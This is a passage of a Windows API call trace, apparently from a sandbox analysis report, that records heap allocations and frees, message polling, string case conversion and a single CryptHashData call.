(HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0186.632] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0186.632] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e507a0 [0186.632] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78858 [0186.632] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0186.632] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e48 [0186.632] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e78 [0186.632] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50908 [0186.632] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d98 [0186.632] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50878 [0186.632] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508d8 [0186.632] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ed8 [0186.632] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508a8 [0186.632] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50938 [0186.632] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e38 [0186.632] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50740 [0186.632] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54080 [0186.632] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507a0 [0186.632] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0186.632] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50728 [0186.632] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0186.632] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50758 [0186.632] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507d0 [0186.632] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0186.633] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69928 [0186.633] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977908 [0186.633] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ba8 [0186.633] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0186.633] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a10 [0186.633] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0186.633] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c08 [0186.633] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78bb8 [0186.633] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c20 [0186.633] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dd8 [0186.633] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b60 [0186.633] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c38 [0186.633] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0186.633] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69b68 [0186.633] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977998 [0186.633] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a58 [0186.633] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54de8 [0186.633] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b30 [0186.633] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0186.633] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a40 [0186.633] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bc0 [0186.633] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0186.633] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0186.633] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a58 [0186.633] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0186.633] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bf0 [0186.633] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0186.634] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0186.634] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b48 [0186.634] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50aa0 [0186.634] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ea8 [0186.634] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b48 [0186.634] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0186.634] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0186.634] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c38 [0186.634] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0186.634] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c38 [0186.634] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0186.634] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e38 [0186.634] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b90 [0186.634] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e48 [0186.634] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ad0 [0186.634] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54de8 [0186.634] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0186.634] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bf0 [0186.634] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0186.634] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ad0 [0186.634] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d58 [0186.634] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e38 [0186.634] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c38 [0186.634] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bf0 [0186.634] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0186.634] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0186.634] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xe) returned 0x2e50c38 [0186.634] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x2e50c38, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0186.635] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c38 [0186.635] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d78 [0186.635] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0186.635] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dd8 [0186.635] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0186.635] CryptHashData (hHash=0xa87390, pbData=0x2e54db8, dwDataLen=0x3, dwFlags=0x1) returned 1 [0186.635] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0186.635] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e698c8 [0186.635] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0186.635] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b48 [0186.635] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c98 [0186.635] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cb0 [0186.635] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0186.635] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cb0 | out: hHeap=0x970000) returned 1 [0186.635] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0186.635] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c98 | out: hHeap=0x970000) returned 1 [0186.635] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c80 [0186.635] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509e0 [0186.635] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c38 [0186.635] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0186.635] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c38 | out: hHeap=0x970000) returned 1 [0186.635] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0186.636] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509e0 | out: hHeap=0x970000) returned 1 [0186.636] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c38 [0186.636] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c50 [0186.636] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b90 [0186.636] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0186.636] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b90 | out: hHeap=0x970000) returned 1 [0186.636] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0186.636] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c50 | out: hHeap=0x970000) returned 1 [0186.636] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69988 [0186.636] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977a28 [0186.636] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c98 [0186.636] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0186.636] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a70 [0186.636] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509e0 [0186.636] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c50 [0186.636] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0186.636] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c50 | out: hHeap=0x970000) returned 1 [0186.636] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0186.636] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509e0 | out: hHeap=0x970000) returned 1 [0186.636] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bf0 [0186.636] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ad0 [0186.636] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c50 [0186.636] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d78 [0186.636] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c50 | out: hHeap=0x970000) returned 1 [0186.637] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0186.637] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ad0 | out: hHeap=0x970000) returned 1 [0186.637] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0186.637] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0186.637] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0186.637] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0186.637] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50aa0 | out: hHeap=0x970000) returned 1 [0186.637] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a58 | out: hHeap=0x970000) returned 1 [0186.637] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0186.637] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50998 | out: hHeap=0x970000) returned 1 [0186.637] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50878 | out: hHeap=0x970000) returned 1 [0186.637] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50908 | out: hHeap=0x970000) returned 1 [0186.637] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508a8 | out: hHeap=0x970000) returned 1 [0186.637] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508d8 | out: hHeap=0x970000) returned 1 [0186.637] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50740 | out: hHeap=0x970000) returned 1 [0186.637] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50938 | out: hHeap=0x970000) returned 1 [0186.637] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507a0 | out: hHeap=0x970000) returned 1 [0186.637] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50758 | out: hHeap=0x970000) returned 1 [0186.637] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50728 | out: hHeap=0x970000) returned 1 [0186.637] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ba8 | out: hHeap=0x970000) returned 1 [0186.637] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0186.637] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977908 | out: hHeap=0x970000) returned 1 [0186.637] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69928 | out: hHeap=0x970000) returned 1 [0186.637] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507d0 | out: hHeap=0x970000) returned 1 [0186.637] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c08 | out: hHeap=0x970000) returned 1 [0186.637] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a10 | out: hHeap=0x970000) returned 1 [0186.638] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c20 | out: hHeap=0x970000) returned 1 [0186.638] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a40 | out: hHeap=0x970000) returned 1 [0186.638] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b30 | out: hHeap=0x970000) returned 1 [0186.638] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bc0 | out: hHeap=0x970000) returned 1 [0186.639] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78bb8 | out: hHeap=0x970000) returned 1 [0186.640] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0186.640] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a88 | out: hHeap=0x970000) returned 1 [0186.640] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bd8 | out: hHeap=0x970000) returned 1 [0186.640] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c68 | out: hHeap=0x970000) returned 1 [0186.640] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a28 | out: hHeap=0x970000) returned 1 [0186.640] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ab8 | out: hHeap=0x970000) returned 1 [0186.640] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509f8 | out: hHeap=0x970000) returned 1 [0186.640] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a68 | out: hHeap=0x970000) returned 1 [0186.640] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0186.640] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e558d8 | out: hHeap=0x970000) returned 1 [0186.640] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e558d8 [0186.640] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978490 | out: hHeap=0x970000) returned 1 [0186.640] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0186.640] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0186.640] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e58 [0186.640] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0186.640] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b88 [0186.640] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0186.640] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0186.640] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0186.640] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b88 | out: hHeap=0x970000) returned 1 [0186.640] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0186.640] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0186.640] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77688 [0186.640] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0186.640] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77688 | out: hHeap=0x970000) returned 1 [0186.640] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0186.640] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d78 [0186.640] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c08 [0186.640] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ab8 [0186.641] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e48 [0186.641] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fce0 [0186.641] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0186.641] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0186.641] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fce0 | out: hHeap=0x970000) returned 1 [0186.641] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0186.641] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50a10 [0186.641] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0186.641] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0186.641] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e58 [0186.641] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dd8 [0186.641] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0186.641] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0186.641] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0186.641] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a10 | out: hHeap=0x970000) returned 1 [0186.641] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0186.641] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cb0 [0186.641] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0186.641] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a40 [0186.641] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0186.641] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b60 [0186.641] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0186.641] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ae8 [0186.641] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0186.641] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c50 [0186.641] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d88 [0186.641] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509e0 [0186.641] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0186.641] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54080 [0186.642] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c08 | out: hHeap=0x970000) returned 1 [0186.642] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b00 [0186.642] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d48 [0186.642] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54260 [0186.642] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0186.642] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0186.642] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54260 | out: hHeap=0x970000) returned 1 [0186.642] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0186.642] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50ad0 [0186.642] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78858 [0186.642] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0186.642] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0186.642] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0186.642] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0186.642] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0186.642] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0186.642] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ad0 | out: hHeap=0x970000) returned 1 [0186.642] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0186.642] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509c8 [0186.642] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dd8 [0186.642] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b90 [0186.642] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0186.642] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509f8 [0186.642] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d88 [0186.643] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0186.643] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b18 [0186.643] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dd8 [0186.643] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ba8 [0186.643] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0186.643] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0186.643] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54080 | out: hHeap=0x970000) returned 1 [0186.643] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b78 [0186.643] RtlAllocateHeap (HeapHandle=0x970000, 